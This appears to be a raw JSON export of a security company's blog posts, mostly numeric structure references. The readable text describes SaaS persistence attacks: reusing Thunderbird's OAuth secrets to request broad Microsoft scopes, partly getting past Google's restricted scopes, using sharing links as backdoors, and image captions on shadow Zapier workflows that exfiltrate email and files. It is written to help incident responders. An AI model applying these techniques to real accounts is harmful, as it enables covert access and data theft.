Granting",[289606],{"type":370},{},{"nodeType":173,"value":289609,"marks":289610,"data":289611}," - We aren’t actually limited to just the permissions that Thunderbird would normally request (e.g. email/calendar). Since we’re in control of the OAuth secrets, we can just request whatever scopes we want. For example, shown below is us using the Microsoft Thunderbird OAuth secrets to request permissions that also include access to all files, Sharepoint, AD access, etc. \n",[],{},{"nodeType":312,"data":289613,"content":289617},{"target":289614},{"sys":289615},{"id":289616,"type":317,"linkType":318},"22nQPPKCgUUEr7QPQBFHNS",[],{"nodeType":312,"data":289619,"content":289623},{"target":289620},{"sys":289621},{"id":289622,"type":317,"linkType":318},"5eIVlfPzpxuO7D41r7DPfe",[],{"nodeType":250,"data":289625,"content":289626},{},[289627],{"nodeType":254,"data":289628,"content":289629},{},[289630],{"nodeType":178,"data":289631,"content":289632},{},[289633,289638],{"nodeType":173,"value":289634,"marks":289635,"data":289637},"(Semi-)Bypass Google Restricted Scopes",[289636],{"type":370},{},{"nodeType":173,"value":289639,"marks":289640,"data":289641}," - When it comes to arbitrary permission granting, there is a caveat with Google in that some of the more sensitive scopes Google offer are only available to selected approved and verified apps. Therefore, we can’t necessarily just request access to any permission with Google. For example, if we modify Thunderbird to request access to Google Drive (a restricted scope) then we get the following: ",[],{},{"nodeType":312,"data":289643,"content":289647},{"target":289644},{"sys":289645},{"id":289646,"type":317,"linkType":318},"3HIcve3zqVFheiZ2tJILJl",[],{"nodeType":178,"data":289649,"content":289650},{},[289651],{"nodeType":173,"value":289652,"marks":289653,"data":289654},"Access to Gmail is also considered a restricted scope. However, obviously Thunderbird is an email client, so if it uses OAuth it’s going to want access to Gmail, right? Well, yes, the Thunderbird app ID is permitted access to Gmail data, so we can use it to gain that access and appear as a legitimate verified app, in addition to requesting any other non-restricted permissions we’re interested in: ",[],{},{"nodeType":312,"data":289656,"content":289660},{"target":289657},{"sys":289658},{"id":289659,"type":317,"linkType":318},"5SqY9Q2g7DpHhCGJVQDcgF",[],{"nodeType":235,"data":289662,"content":289663},{},[289664],{"nodeType":173,"value":289665,"marks":289666,"data":289667},"Document-sharing links",[],{},{"nodeType":312,"data":289669,"content":289673},{"target":289670},{"sys":289671},{"id":289672,"type":317,"linkType":318},"2EEC98Ros0MdMX2gt4OGKe",[],{"nodeType":178,"data":289675,"content":289676},{},[289677],{"nodeType":173,"value":289678,"marks":289679,"data":289680},"Ok, no more OAuth, we promise! The final option we want to highlight is the (ab-)use of document-sharing links. Many organizations make use of OneDrive, Sharepoint and Google Drive for document editing, sharing and collaboration. However, it’s pretty common to want to share documents with people outside your organization sometimes too, right? That’s where document-sharing links come in. You can create a document sharing link to share with specific individuals in other Google/Azure organizations or you can create anonymous links that anyone with knowledge of the (unguessable randomized) link can access.",[],{},{"nodeType":178,"data":289682,"content":289683},{},[289684],{"nodeType":173,"value":289685,"marks":289686,"data":289687},"Very similar functionality is present in both OneDrive and Google Drive, but this same legitimate functionality can also be abused by attackers to maintain backdoor access to either select files or entire root folders. Sharing a root folder will cause future files to inherit those sharing permissions. This is a modern repeat of the age-old problem of access control list (ACL) management on internal file servers, only now internet-based attackers can potentially abuse this without needing VPN or similar access. ",[],{},{"nodeType":312,"data":289689,"content":289693},{"target":289690},{"sys":289691},{"id":289692,"type":317,"linkType":318},"4IUv2rbEMXrJUAdEYC9xxD",[],{"nodeType":312,"data":289695,"content":289699},{"target":289696},{"sys":289697},{"id":289698,"type":317,"linkType":318},"bMAt7XvLmIEIDwzZrAawU",[],{"nodeType":235,"data":289701,"content":289702},{},[289703],{"nodeType":173,"value":40632,"marks":289704,"data":289705},[],{},{"nodeType":178,"data":289707,"content":289708},{},[289709],{"nodeType":173,"value":289710,"marks":289711,"data":289712},"We've demonstrated a few new persistence options attackers are using against organizations as they move to the cloud. While some existing persistence and lateral movement options are no longer working in these environments, attackers have been able to quickly adapt to new conditions to get at their targets.",[],{},{"nodeType":178,"data":289714,"content":289715},{},[289716],{"nodeType":173,"value":289717,"marks":289718,"data":289719},"Some of these attacks have already been seen in the wild and others may already be happening under the radar. In any case, being aware of how attackers will try to compromise SaaS-first organizations helps you prepare to defend and respond to these attacks. ",[],{},{"nodeType":178,"data":289721,"content":289722},{},[289723],{"nodeType":173,"value":289724,"marks":289725,"data":289726},"It’s extremely important for incident response teams to adapt to these changes, as a password reset and a device wipe is not sufficient to regain control of a user account, even when no lateral movement to internal systems has been performed.",[],{},{"nodeType":178,"data":289728,"content":289729},{},[289730],{"nodeType":173,"value":289731,"marks":289732,"data":289733},"New steps need to be added to IR playbooks in the event of user or device compromises to cover the revocation of OAuth permissions and refresh tokens, the auditing of mail rules and changes to document sharing configurations.",[],{},"Attackers have loads of persistence options in an endpoint compromise scenario, but what changes in a SaaS-first world? We talk new attack methods in this post.","2022-11-29T00:00:00.000Z",{"items":289737},[289738],{"sys":289739,"name":505},{"id":504},{"items":289741},[289742],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":289743},{"url":8615},{"items":289745},[289746],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":289747},{"url":8615},{"json":289749,"links":290507},{"nodeType":165,"data":289750,"content":289751},{},[289752,289758,289764,289792,289798,289804,289820,289826,289832,289838,289862,289868,289874,289887,289893,289899,289929,289935,289941,289947,289953,289959,289964,289970,289976,289982,289989,289995,290011,290017,290023,290029,290035,290041,290047,290053,290059,290065,290070,290076,290092,290098,290114,290119,290124,290129,290135,290141,290147,290152,290157,290163,290169,290175,290181,290187,290192,290208,290224,290230,290235,290240,290246,290252,290258,290264,290285,290290,290295,290301,290307,290313,290323,290328,290334,290339,290344,290350,290356,290362,290367,290372,290378,290384,290489,290495,290501],{"nodeType":178,"data":289753,"content":289754},{},[289755],{"nodeType":173,"value":267888,"marks":289756,"data":289757},[],{},{"nodeType":178,"data":289759,"content":289760},{},[289761],{"nodeType":173,"value":267895,"marks":289762,"data":289763},[],{},{"nodeType":178,"data":289765,"content":289766},{},[289767,289770,289777,289780,289789],{"nodeType":173,"value":267902,"marks":289768,"data":289769},[],{},{"nodeType":186,"data":289771,"content":289772},{"uri":88239},[289773],{"nodeType":173,"value":88742,"marks":289774,"data":289776},[289775],{"type":194},{},{"nodeType":173,"value":267913,"marks":289778,"data":289779},[],{},{"nodeType":1698,"data":289781,"content":289784},{"target":289782},{"sys":289783},{"id":228244,"type":317,"linkType":318},[289785],{"nodeType":173,"value":252406,"marks":289786,"data":289788},[289787],{"type":194},{},{"nodeType":173,"value":197,"marks":289790,"data":289791},[],{},{"nodeType":178,"data":289793,"content":289794},{},[289795],{"nodeType":173,"value":267932,"marks":289796,"data":289797},[],{},{"nodeType":169,"data":289799,"content":289800},{},[289801],{"nodeType":173,"value":267939,"marks":289802,"data":289803},[],{},{"nodeType":178,"data":289805,"content":289806},{},[289807,289810,289817],{"nodeType":173,"value":15816,"marks":289808,"data":289809},[],{},{"nodeType":186,"data":289811,"content":289812},{"uri":144083},[289813],{"nodeType":173,"value":267952,"marks":289814,"data":289816},[289815],{"type":194},{},{"nodeType":173,"value":267957,"marks":289818,"data":289819},[],{},{"nodeType":178,"data":289821,"content":289822},{},[289823],{"nodeType":173,"value":267964,"marks":289824,"data":289825},[],{},{"nodeType":169,"data":289827,"content":289828},{},[289829],{"nodeType":173,"value":267971,"marks":289830,"data":289831},[],{},{"nodeType":178,"data":289833,"content":289834},{},[289835],{"nodeType":173,"value":267978,"marks":289836,"data":289837},[],{},{"nodeType":178,"data":289839,"content":289840},{},[289841,289844,289851,289854,289859],{"nodeType":173,"value":96646,"marks":289842,"data":289843},[],{},{"nodeType":186,"data":289845,"content":289846},{"uri":59335},[289847],{"nodeType":173,"value":208649,"marks":289848,"data":289850},[289849],{"type":194},{},{"nodeType":173,"value":267995,"marks":289852,"data":289853},[],{},{"nodeType":173,"value":267999,"marks":289855,"data":289858},[289856,289857],{"type":1646},{"type":370},{},{"nodeType":173,"value":268005,"marks":289860,"data":289861},[],{},{"nodeType":169,"data":289863,"content":289864},{},[289865],{"nodeType":173,"value":259540,"marks":289866,"data":289867},[],{},{"nodeType":178,"data":289869,"content":289870},{},[289871],{"nodeType":173,"value":268018,"marks":289872,"data":289873},[],{},{"nodeType":178,"data":289875,"content":289876},{},[289877,289880,289884],{"nodeType":173,"value":268025,"marks":289878,"data":289879},[],{},{"nodeType":173,"value":268029,"marks":289881,"data":289883},[289882],{"type":194},{},{"nodeType":173,"value":268034,"marks":289885,"data":289886},[],{},{"nodeType":178,"data":289888,"content":289889},{},[289890],{"nodeType":173,"value":268041,"marks":289891,"data":289892},[],{},{"nodeType":178,"data":289894,"content":289895},{},[289896],{"nodeType":173,"value":268048,"marks":289897,"data":289898},[],{},{"nodeType":246189,"data":289900,"content":289901},{},[289902,289911,289920],{"nodeType":254,"data":289903,"content":289904},{},[289905],{"nodeType":178,"data":289906,"content":289907},{},[289908],{"nodeType":173,"value":268061,"marks":289909,"data":289910},[],{},{"nodeType":254,"data":289912,"content":289913},{},[289914],{"nodeType":178,"data":289915,"content":289916},{},[289917],{"nodeType":173,"value":268071,"marks":289918,"data":289919},[],{},{"nodeType":254,"data":289921,"content":289922},{},[289923],{"nodeType":178,"data":289924,"content":289925},{},[289926],{"nodeType":173,"value":268081,"marks":289927,"data":289928},[],{},{"nodeType":235,"data":289930,"content":289931},{},[289932],{"nodeType":173,"value":268088,"marks":289933,"data":289934},[],{},{"nodeType":178,"data":289936,"content":289937},{},[289938],{"nodeType":173,"value":268095,"marks":289939,"data":289940},[],{},{"nodeType":178,"data":289942,"content":289943},{},[289944],{"nodeType":173,"value":268102,"marks":289945,"data":289946},[],{},{"nodeType":178,"data":289948,"content":289949},{},[289950],{"nodeType":173,"value":268109,"marks":289951,"data":289952},[],{},{"nodeType":178,"data":289954,"content":289955},{},[289956],{"nodeType":173,"value":268116,"marks":289957,"data":289958},[],{},{"nodeType":312,"data":289960,"content":289963},{"target":289961},{"sys":289962},{"id":268123,"type":317,"linkType":318},[],{"nodeType":235,"data":289965,"content":289966},{},[289967],{"nodeType":173,"value":268129,"marks":289968,"data":289969},[],{},{"nodeType":178,"data":289971,"content":289972},{},[289973],{"nodeType":173,"value":268136,"marks":289974,"data":289975},[],{},{"nodeType":178,"data":289977,"content":289978},{},[289979],{"nodeType":173,"value":268143,"marks":289980,"data":289981},[],{},{"nodeType":178,"data":289983,"content":289984},{},[289985],{"nodeType":173,"value":268150,"marks":289986,"data":289988},[289987],{"type":370},{},{"nodeType":235,"data":289990,"content":289991},{},[289992],{"nodeType":173,"value":268158,"marks":289993,"data":289994},[],{},{"nodeType":178,"data":289996,"content":289997},{},[289998,290001,290008],{"nodeType":173,"value":268165,"marks":289999,"data":290000},[],{},{"nodeType":186,"data":290002,"content":290003},{"uri":268170},[290004],{"nodeType":173,"value":268173,"marks":290005,"data":290007},[290006],{"type":194},{},{"nodeType":173,"value":268178,"marks":290009,"data":290010},[],{},{"nodeType":178,"data":290012,"content":290013},{},[290014],{"nodeType":173,"value":268185,"marks":290015,"data":290016},[],{},{"nodeType":178,"data":290018,"content":290019},{},[290020],{"nodeType":173,"value":268192,"marks":290021,"data":290022},[],{},{"nodeType":169,"data":290024,"content":290025},{},[290026],{"nodeType":173,"value":268199,"marks":290027,"data":290028},[],{},{"nodeType":178,"data":290030,"content":290031},{},[290032],{"nodeType":173,"value":268206,"marks":290033,"data":290034},[],{},{"nodeType":178,"data":290036,"content":290037},{},[290038],{"nodeType":173,"value":268213,"marks":290039,"data":290040},[],{},{"nodeType":178,"data":290042,"content":290043},{},[290044],{"nodeType":173,"value":268220,"marks":290045,"data":290046},[],{},{"nodeType":178,"data":290048,"content":290049},{},[290050],{"nodeType":173,"value":268227,"marks":290051,"data":290052},[],{},{"nodeType":178,"data":290054,"content":290055},{},[290056],{"nodeType":173,"value":268234,"marks":290057,"data":290058},[],{},{"nodeType":178,"data":290060,"content":290061},{},[290062],{"nodeType":173,"value":268241,"marks":290063,"data":290064},[],{},{"nodeType":312,"data":290066,"content":290069},{"target":290067},{"sys":290068},{"id":268248,"type":317,"linkType":318},[],{"nodeType":169,"data":290071,"content":290072},{},[290073],{"nodeType":173,"value":268254,"marks":290074,"data":290075},[],{},{"nodeType":178,"data":290077,"content":290078},{},[290079,290082,290089],{"nodeType":173,"value":268261,"marks":290080,"data":290081},[],{},{"nodeType":186,"data":290083,"content":290084},{"uri":197841},[290085],{"nodeType":173,"value":268268,"marks":290086,"data":290088},[290087],{"type":194},{},{"nodeType":173,"value":268273,"marks":290090,"data":290091},[],{},{"nodeType":235,"data":290093,"content":290094},{},[290095],{"nodeType":173,"value":268280,"marks":290096,"data":290097},[],{},{"nodeType":178,"data":290099,"content":290100},{},[290101,290104,290111],{"nodeType":173,"value":268287,"marks":290102,"data":290103},[],{},{"nodeType":186,"data":290105,"content":290106},{"uri":268292},[290107],{"nodeType":173,"value":268292,"marks":290108,"data":290110},[290109],{"type":194},{},{"nodeType":173,"value":268299,"marks":290112,"data":290113},[],{},{"nodeType":312,"data":290115,"content":290118},{"target":290116},{"sys":290117},{"id":268306,"type":317,"linkType":318},[],{"nodeType":312,"data":290120,"content":290123},{"target":290121},{"sys":290122},{"id":268312,"type":317,"linkType":318},[],{"nodeType":312,"data":290125,"content":290128},{"target":290126},{"sys":290127},{"id":268318,"type":317,"linkType":318},[],{"nodeType":235,"data":290130,"content":290131},{},[290132],{"nodeType":173,"value":268324,"marks":290133,"data":290134},[],{},{"nodeType":178,"data":290136,"content":290137},{},[290138],{"nodeType":173,"value":268331,"marks":290139,"data":290140},[],{},{"nodeType":178,"data":290142,"content":290143},{},[290144],{"nodeType":173,"value":268338,"marks":290145,"data":290146},[],{},{"nodeType":312,"data":290148,"content":290151},{"target":290149},{"sys":290150},{"id":268345,"type":317,"linkType":318},[],{"nodeType":312,"data":290153,"content":290156},{"target":290154},{"sys":290155},{"id":268351,"type":317,"linkType":318},[],{"nodeType":169,"data":290158,"content":290159},{},[290160],{"nodeType":173,"value":268357,"marks":290161,"data":290162},[],{},{"nodeType":178,"data":290164,"content":290165},{},[290166],{"nodeType":173,"value":268364,"marks":290167,"data":290168},[],{},{"nodeType":178,"data":290170,"content":290171},{},[290172],{"nodeType":173,"value":268371,"marks":290173,"data":290174},[],{},{"nodeType":235,"data":290176,"content":290177},{},[290178],{"nodeType":173,"value":268378,"marks":290179,"data":290180},[],{},{"nodeType":178,"data":290182,"content":290183},{},[290184],{"nodeType":173,"value":268385,"marks":290185,"data":290186},[],{},{"nodeType":312,"data":290188,"content":290191},{"target":290189},{"sys":290190},{"id":268392,"type":317,"linkType":318},[],{"nodeType":178,"data":290193,"content":290194},{},[290195,290198,290205],{"nodeType":173,"value":268398,"marks":290196,"data":290197},[],{},{"nodeType":186,"data":290199,"content":290200},{"uri":259860},[290201],{"nodeType":173,"value":259866,"marks":290202,"data":290204},[290203],{"type":194},{},{"nodeType":173,"value":268409,"marks":290206,"data":290207},[],{},{"nodeType":178,"data":290209,"content":290210},{},[290211,290214,290221],{"nodeType":173,"value":268416,"marks":290212,"data":290213},[],{},{"nodeType":186,"data":290215,"content":290216},{"uri":197917},[290217],{"nodeType":173,"value":268423,"marks":290218,"data":290220},[290219],{"type":194},{},{"nodeType":173,"value":268428,"marks":290222,"data":290223},[],{},{"nodeType":178,"data":290225,"content":290226},{},[290227],{"nodeType":173,"value":268435,"marks":290228,"data":290229},[],{},{"nodeType":312,"data":290231,"content":290234},{"target":290232},{"sys":290233},{"id":268442,"type":317,"linkType":318},[],{"nodeType":312,"data":290236,"content":290239},{"target":290237},{"sys":290238},{"id":268448,"type":317,"linkType":318},[],{"nodeType":178,"data":290241,"content":290242},{},[290243],{"nodeType":173,"value":268454,"marks":290244,"data":290245},[],{},{"nodeType":235,"data":290247,"content":290248},{},[290249],{"nodeType":173,"value":268461,"marks":290250,"data":290251},[],{},{"nodeType":178,"data":290253,"content":290254},{},[290255],{"nodeType":173,"value":268468,"marks":290256,"data":290257},[],{},{"nodeType":178,"data":290259,"content":290260},{},[290261],{"nodeType":173,"value":268475,"marks":290262,"data":290263},[],{},{"nodeType":250,"data":290265,"content":290266},{},[290267,290276],{"nodeType":254,"data":290268,"content":290269},{},[290270],{"nodeType":178,"data":290271,"content":290272},{},[290273],{"nodeType":173,"value":268488,"marks":290274,"data":290275},[],{},{"nodeType":254,"data":290277,"content":290278},{},[290279],{"nodeType":178,"data":290280,"content":290281},{},[290282],{"nodeType":173,"value":268498,"marks":290283,"data":290284},[],{},{"nodeType":312,"data":290286,"content":290289},{"target":290287},{"sys":290288},{"id":268505,"type":317,"linkType":318},[],{"nodeType":312,"data":290291,"content":290294},{"target":290292},{"sys":290293},{"id":268511,"type":317,"linkType":318},[],{"nodeType":178,"data":290296,"content":290297},{},[290298],{"nodeType":173,"value":268517,"marks":290299,"data":290300},[],{},{"nodeType":178,"data":290302,"content":290303},{},[290304],{"nodeType":173,"value":268524,"marks":290305,"data":290306},[],{},{"nodeType":178,"data":290308,"content":290309},{},[290310],{"nodeType":173,"value":268531,"marks":290311,"data":290312},[],{},{"nodeType":178,"data":290314,"content":290315},{},[290316,290319],{"nodeType":173,"value":268538,"marks":290317,"data":290318},[],{},{"nodeType":173,"value":10557,"marks":290320,"data":290322},[290321],{"type":1646},{},{"nodeType":312,"data":290324,"content":290327},{"target":290325},{"sys":290326},{"id":268549,"type":317,"linkType":318},[],{"nodeType":178,"data":290329,"content":290330},{},[290331],{"nodeType":173,"value":268555,"marks":290332,"data":290333},[],{},{"nodeType":312,"data":290335,"content":290338},{"target":290336},{"sys":290337},{"id":268562,"type":317,"linkType":318},[],{"nodeType":312,"data":290340,"content":290343},{"target":290341},{"sys":290342},{"id":268568,"type":317,"linkType":318},[],{"nodeType":178,"data":290345,"content":290346},{},[290347],{"nodeType":173,"value":268574,"marks":290348,"data":290349},[],{},{"nodeType":169,"data":290351,"content":290352},{},[290353],{"nodeType":173,"value":268581,"marks":290354,"data":290355},[],{},{"nodeType":178,"data":290357,"content":290358},{},[290359],{"nodeType":173,"value":268588,"marks":290360,"data":290361},[],{},{"nodeType":312,"data":290363,"content":290366},{"target":290364},{"sys":290365},{"id":268595,"type":317,"linkType":318},[],{"nodeType":312,"data":290368,"content":290371},{"target":290369},{"sys":290370},{"id":268601,"type":317,"linkType":318},[],{"nodeType":169,"data":290373,"content":290374},{},[290375],{"nodeType":173,"value":15539,"marks":290376,"data":290377},[],{},{"nodeType":178,"data":290379,"content":290380},{},[290381],{"nodeType":173,"value":268613,"marks":290382,"data":290383},[],{},{"nodeType":250,"data":290385,"content":290386},{},[290387,290396,290405,290414,290423,290471,290480],{"nodeType":254,"data":290388,"content":290389},{},[290390],{"nodeType":178,"data":290391,"content":290392},{},[290393],{"nodeType":173,"value":268626,"marks":290394,"data":290395},[],{},{"nodeType":254,"data":290397,"content":290398},{},[290399],{"nodeType":178,"data":290400,"content":290401},{},[290402],{"nodeType":173,"value":268636,"marks":290403,"data":290404},[],{},{"nodeType":254,"data":290406,"content":290407},{},[290408],{"nodeType":178,"data":290409,"content":290410},{},[290411],{"nodeType":173,"value":268646,"marks":290412,"data":290413},[],{},{"nodeType":254,"data":290415,"content":290416},{},[290417],{"nodeType":178,"data":290418,"content":290419},{},[290420],{"nodeType":173,"value":268656,"marks":290421,"data":290422},[],{},{"nodeType":254,"data":290424,"content":290425},{},[290426,290432],{"nodeType":178,"data":290427,"content":290428},{},[290429],{"nodeType":173,"value":268666,"marks":290430,"data":290431},[],{},{"nodeType":250,"data":290433,"content":290434},{},[290435,290444,290453,290462],{"nodeType":254,"data":290436,"content":290437},{},[290438],{"nodeType":178,"data":290439,"content":290440},{},[290441],{"nodeType":173,"value":268679,"marks":290442,"data":290443},[],{},{"nodeType":254,"data":290445,"content":290446},{},[290447],{"nodeType":178,"data":290448,"content":290449},{},[290450],{"nodeType":173,"value":268689,"marks":290451,"data":290452},[],{},{"nodeType":254,"data":290454,"content":290455},{},[290456],{"nodeType":178,"data":290457,"content":290458},{},[290459],{"nodeType":173,"value":268699,"marks":290460,"data":290461},[],{},{"nodeType":254,"data":290463,"content":290464},{},[290465],{"nodeType":178,"data":290466,"content":290467},{},[290468],{"nodeType":173,"value":268709,"marks":290469,"data":290470},[],{},{"nodeType":254,"data":290472,"content":290473},{},[290474],{"nodeType":178,"data":290475,"content":290476},{},[290477],{"nodeType":173,"value":268719,"marks":290478,"data":290479},[],{},{"nodeType":254,"data":290481,"content":290482},{},[290483],{"nodeType":178,"data":290484,"content":290485},{},[290486],{"nodeType":173,"value":268729,"marks":290487,"data":290488},[],{},{"nodeType":169,"data":290490,"content":290491},{},[290492],{"nodeType":173,"value":40632,"marks":290493,"data":290494},[],{},{"nodeType":178,"data":290496,"content":290497},{},[290498],{"nodeType":173,"value":268742,"marks":290499,"data":290500},[],{},{"nodeType":178,"data":290502,"content":290503},{},[290504],{"nodeType":173,"value":268749,"marks":290505,"data":290506},[],{},{"entries":290508},{"inline":290509,"hyperlink":290510,"block":290513},[],[290511],{"sys":290512,"__typename":1528,"title":252406,"slug":252407},{"id":228244},[290514,290521,290529,290535,290542,290549,290557,290565,290572,290580,290586,290593,290599,290606,290614,290621,290628],{"sys":290515,"__typename":5345,"title":290516,"caption":290517,"layoutMode":118,"file":290518},{"id":268123},"Azure audit logs","Azure audit logs showing a new user consent for a Zapier integration already in use by other users inside the organization",{"url":290519,"width":5358,"height":290520},"https://images.ctfassets.net/y1cdw1ablpvd/7KXqNa7LYhg9RpMODcCOUA/cf5cc3c63c3fb23bf4db4fc687c52fef/image11.png",188,{"sys":290522,"__typename":127689,"title":290523,"youTubeUrl":290524,"imagePlaceholder":290525},{"id":268248},"SaaS Attacks: Shadow workflows + Evil twin integration demo","https://youtu.be/g2EITjjJH1s",{"url":290526,"width":290527,"height":290528},"https://images.ctfassets.net/y1cdw1ablpvd/2XKFsSaDVmUREXzFIFvdgs/41ff444655d2f740bf4c637ebea0e998/Screenshot_2023-09-11_at_10.25.12_AM.png",2996,1616,{"sys":290530,"__typename":5345,"title":290531,"caption":290532,"layoutMode":118,"file":290533},{"id":268306},"Apps used in Microsoft","Listing apps installed for the user from myapps.microsoft.com ",{"url":290534,"width":42838,"height":211316},"https://images.ctfassets.net/y1cdw1ablpvd/66ISP7TGcsDns9BPvJEz0V/70b5da6883efde3122cabd3c0c1f1eab/image3.png",{"sys":290536,"__typename":5345,"title":290537,"caption":290538,"layoutMode":118,"file":290539},{"id":268312},"Zapier to do","Listing granted permissions for Zapier-related apps (1/2)",{"url":290540,"width":290541,"height":51607},"https://images.ctfassets.net/y1cdw1ablpvd/7lJRrtsR1GuWBGGk3d5FJ2/387c9f8f178e9a8c10e60f5b2ebf026b/image7.png",1108,{"sys":290543,"__typename":5345,"title":290544,"caption":290545,"layoutMode":118,"file":290546},{"id":268318},"Zapier-related app permissions","Listing granted permissions for Zapier-related apps (2/2)",{"url":290547,"width":290548,"height":277495},"https://images.ctfassets.net/y1cdw1ablpvd/9KWSW4Dyy0hfMCa8NzUsP/8bacb7994fd4668fc181c1d4ac190002/image8.png",1729,{"sys":290550,"__typename":5345,"title":290551,"caption":290552,"layoutMode":118,"file":290553},{"id":268345},"Finding a Zapier integration","Listing app role assignments and finding a Zapier integration",{"url":290554,"width":290555,"height":290556},"https://images.ctfassets.net/y1cdw1ablpvd/lkccBtCqQj594UJeRoStz/f4dd2c2deda29907c0e5ab3ed506b375/image4.png",774,430,{"sys":290558,"__typename":5345,"title":290559,"caption":290560,"layoutMode":118,"file":290561},{"id":268351},"Zapier integration OAuth permissions","Listing OAuth permission grants for the Zapier integration to confirm permissions",{"url":290562,"width":290563,"height":290564},"https://images.ctfassets.net/y1cdw1ablpvd/4eZco97TV404HaHoAnYGSA/04e5e66ae37fa8ee52418d5533437386/image15.png",1219,395,{"sys":290566,"__typename":5345,"title":290567,"caption":290568,"layoutMode":118,"file":290569},{"id":268392},"Zapier login via SSO","Login to Zapier via SSO or social login",{"url":290570,"width":290571,"height":173185},"https://images.ctfassets.net/y1cdw1ablpvd/57LigpMizflfTbTcfrcRwM/e81063c2a092be712cc180f1af1ee909/image10.png",1244,{"sys":290573,"__typename":5345,"title":290574,"caption":290575,"layoutMode":118,"file":290576},{"id":268442},"User's Zapier workflows","The user’s existing workflows, or “Zaps” in Zapier terminology",{"url":290577,"width":290578,"height":290579},"https://images.ctfassets.net/y1cdw1ablpvd/1HD2bnkcnGnc5YQAHHrvIa/08b1a537a9f63d0fb600d837eee1df25/image14.png",1426,382,{"sys":290581,"__typename":5345,"title":290582,"caption":290583,"layoutMode":118,"file":290584},{"id":268448},"Zapier integrations","The user’s connected apps, showing Outlook and OneDrive have already been integrated",{"url":290585,"width":290548,"height":272711},"https://images.ctfassets.net/y1cdw1ablpvd/4RII43nqlcqFT4E7QuGOGT/ef85aa394465906185bc52985f4b28e8/image2.png",{"sys":290587,"__typename":5345,"title":290588,"caption":290589,"layoutMode":118,"file":290590},{"id":268505},"Connecting our accounts","We have connected the user’s Outlook and OneDrive, as well as our own Gmail and Google Drive for exfiltration",{"url":290591,"width":148526,"height":290592},"https://images.ctfassets.net/y1cdw1ablpvd/7gmTTPtcrhbPDrQD1BId55/26c7fd0a5d1391bd5ec627c73af587db/image16.png",419,{"sys":290594,"__typename":5345,"title":290595,"caption":290596,"layoutMode":118,"file":290597},{"id":268511},"Our shadow workflows","Shadow workflows we have created to monitor the target user’s emails and files",{"url":290598,"width":277538,"height":188763},"https://images.ctfassets.net/y1cdw1ablpvd/ggCqvwRtNLcvBVqvZMEF0/a9b0b60c80c835f6dca01c1fc408df08/image12.png",{"sys":290600,"__typename":5345,"title":290601,"caption":290602,"layoutMode":118,"file":290603},{"id":268549},"New sign-in events"," Interactive sign-in events caused by the new integrations with the new Zapier account",{"url":290604,"width":23893,"height":290605},"https://images.ctfassets.net/y1cdw1ablpvd/3W6qH6wxjm7fRRjuMeYtRD/779265dba840306f2002132abd24c060/image6.png",148,{"sys":290607,"__typename":5345,"title":290608,"caption":290609,"layoutMode":118,"file":290610},{"id":268562},"What's shown in audit logs","Audit log showing the Zapier integration downloading a file - this is a result of the shadow workflow",{"url":290611,"width":290612,"height":290613},"https://images.ctfassets.net/y1cdw1ablpvd/ew0JDU7oER8cLZUxmyySV/cb39ead350b0704ac78b05c7c5445503/image9.png",569,535,{"sys":290615,"__typename":5345,"title":290616,"caption":290617,"layoutMode":118,"file":290618},{"id":268568},"Audit log showing file upload","Audit log showing the Zapier integration uploading a file - this is the result of the legitimate integration that forwards business expense emails",{"url":290619,"width":290612,"height":290620},"https://images.ctfassets.net/y1cdw1ablpvd/7uv04lFua20rYKyE9VsOv/a2893b9c5540e55732eb9acb62b79b0e/image5.png",609,{"sys":290622,"__typename":5345,"title":290623,"caption":290624,"layoutMode":118,"file":290625},{"id":268595},"Leaked doc in attacker's GDrive","Confidential document from OneDrive appears in Google Drive",{"url":290626,"width":290627,"height":219917},"https://images.ctfassets.net/y1cdw1ablpvd/5jwmXBmrQgA0fmHYn9CK4g/63a689ef0014f15f4cac05d47950e151/image13.png",1319,{"sys":290629,"__typename":5345,"title":290630,"caption":290631,"layoutMode":118,"file":290632},{"id":268601},"Leaked email to attacker's inbox","Confidential email from Outlook appears in GMail",{"url":290633,"width":290634,"height":290635},"https://images.ctfassets.net/y1cdw1ablpvd/7buoz26rTelsWCvn9H8eUq/af55d1b900b715e943b891535efac456/image1.png",1101,271,"content:blog:nearly-invisible-attack-chain.json","blog/nearly-invisible-attack-chain.json","blog/nearly-invisible-attack-chain",{"_path":290640,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":290641,"ogImage":118,"summary":290644,"title":290655,"subtitle":118,"metaTitle":290656,"synopsis":290657,"hashTags":118,"publishedDate":290658,"slug":290659,"tagsCollection":290660,"content":290666,"relatedBlogPostsCollection":291396,"authorsCollection":293013,"_id":293017,"_type":5439,"_source":5440,"_file":293018,"_stem":293019,"_extension":5439},"/blog/the-risky-terrain-of-oauth-scopes-in-third-party",{"id":290642,"publishedAt":290643},"7D24HwiebYpKv6FRe1ouwv","2024-10-01T13:15:27.455Z",{"json":290645},{"data":290646,"content":290647,"nodeType":165},{},[290648],{"data":290649,"content":290650,"nodeType":178},{},[290651],{"data":290652,"marks":290653,"value":290654,"nodeType":173},{},[],"While OAuth scopes provide seamless online user authentication, they also carry significant risk. This article explores these common, dangerous scopes so you can keep an eye out for them during your next risk assessment.\n","Under the radar: The risky terrain of OAuth scopes in third-party Integrations","Dangerous OAuth scopes in third-party Integrations","While OAuth scopes provide seamless online user authentication, they also carry significant risk. Watch out for these common, dangerous scopes.\n","2023-09-06T00:00:00.000Z","the-risky-terrain-of-oauth-scopes-in-third-party",{"items":290661},[290662,290664],{"sys":290663,"name":26133},{"id":26132},{"sys":290665,"name":509},{"id":508},{"json":290667,"links":291385},{"nodeType":165,"data":290668,"content":290669},{},[290670,290677,290684,290691,290699,290747,290754,290761,290768,290776,290868,290875,290882,290889,290896,290943,290950,290957,290965,291012,291019,291048,291055,291063,291155,291162,291169,291176,291184,291230,291237,291244,291251,291259,291300,291307,291314,291321,291340,291347,291354,291374,291379],{"nodeType":178,"data":290671,"content":290672},{},[290673],{"nodeType":173,"value":290674,"marks":290675,"data":290676},"While OAuth scopes are instrumental in providing seamless online user authentication, they also carry significant risk in terms of security breaches. This risk magnifies when exposed to malicious actors, who can exploit certain high-risk scopes such as Microsoft 365’s “MailboxSettings.ReadWrite”, and Google Workspace’s “gmail.settings.sharing” to carry out nefarious actions.",[],{},{"nodeType":178,"data":290678,"content":290679},{},[290680],{"nodeType":173,"value":290681,"marks":290682,"data":290683},"This article includes the most common high-risk scopes that may pose risk to your organization following the compromise of a third-party integration. Watch out for these common, dangerous scopes in your next risk 